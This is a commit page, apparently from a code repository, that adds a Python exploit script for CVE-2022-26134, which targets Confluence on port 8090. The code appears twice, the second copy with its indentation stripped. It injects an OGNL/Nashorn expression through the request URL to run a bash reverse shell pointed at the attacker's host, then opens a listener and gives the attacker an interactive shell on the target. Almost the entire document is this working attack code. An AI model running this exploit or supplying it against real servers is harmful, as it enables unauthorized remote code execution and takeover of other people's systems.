lisp3r · February 6, 2024 19:57
diff --git a/CVE-2022-26134.py b/CVE-2022-26134.py
 #!/usr/bin/python3

 import os, sys, argparse, urllib.parse, socket, requests, time


 def revshell(lhost, lport):
    command = f'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'
    return compile_payload(command)

 def get_target_url(rhost, rport):
    return f"{rhost}:{rport}" if rhost.startswith('http') else f'http://{rhost}:8090'

 def compile_payload(command):
    return urllib.parse.quote('/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command(' + f"'bash','-c','{command}')" + '.start()")}/')


 def send_payload_and_listen(lhost, lport, payload):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((lhost, int(lport)))
    s.listen(1)
    print("Listening on port " + str(lport))

    resp = requests.get(payload)
    print(resp)

    conn, addr = s.accept()
    print('Connection received from ', addr)
    while True:
        ans = conn.recv(1024).decode()
        sys.stdout.write(ans)
        command = input()

        #Send command
        command += "\n"
        conn.send(command.encode())
        time.sleep(1)

        #Remove the output of the "input()" function
        sys.stdout.write("\033[A" + ans.split("\n")[-1])


 parser = argparse.ArgumentParser(prog='CVE-2022-26134')
 parser.add_argument('-rhost', help='Target host')
 parser.add_argument('-rport', default=8090, help='Target port. Default: 8090')
 parser.add_argument('-lhost', help='Your IP')
 parser.add_argument('-lport', help='Your port')


 if __name__ == "__main__":
    args = parser.parse_args()

    if not (args.lhost or args.rhost or args.lport):
        parser.print_help(sys.stderr)
        exit(1)


    command = revshell(args.lhost, args.lport)
    print(command)

    send_payload_and_listen(args.lhost, args.lport, get_target_url(args.rhost, args.rport) + command)
	#!/usr/bin/python3

	import os, sys, argparse, urllib.parse, socket, requests, time


	def revshell(lhost, lport):
	command = f'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'
	return compile_payload(command)

	def get_target_url(rhost, rport):
	return f"{rhost}:{rport}" if rhost.startswith('http') else f'http://{rhost}:8090'

	def compile_payload(command):
	return urllib.parse.quote('/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command(' + f"'bash','-c','{command}')" + '.start()")}/')


	def send_payload_and_listen(lhost, lport, payload):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.bind((lhost, int(lport)))
	s.listen(1)
	print("Listening on port " + str(lport))

	resp = requests.get(payload)
	print(resp)

	conn, addr = s.accept()
	print('Connection received from ', addr)
	while True:
	ans = conn.recv(1024).decode()
	sys.stdout.write(ans)
	command = input()

	#Send command
	command += "\n"
	conn.send(command.encode())
	time.sleep(1)

	#Remove the output of the "input()" function
	sys.stdout.write("\033[A" + ans.split("\n")[-1])


	parser = argparse.ArgumentParser(prog='CVE-2022-26134')
	parser.add_argument('-rhost', help='Target host')
	parser.add_argument('-rport', default=8090, help='Target port. Default: 8090')
	parser.add_argument('-lhost', help='Your IP')
	parser.add_argument('-lport', help='Your port')


	if __name__ == "__main__":
	args = parser.parse_args()

	if not (args.lhost or args.rhost or args.lport):
	parser.print_help(sys.stderr)
	exit(1)


	command = revshell(args.lhost, args.lport)
	print(command)

	send_payload_and_listen(args.lhost, args.lport, get_target_url(args.rhost, args.rport) + command)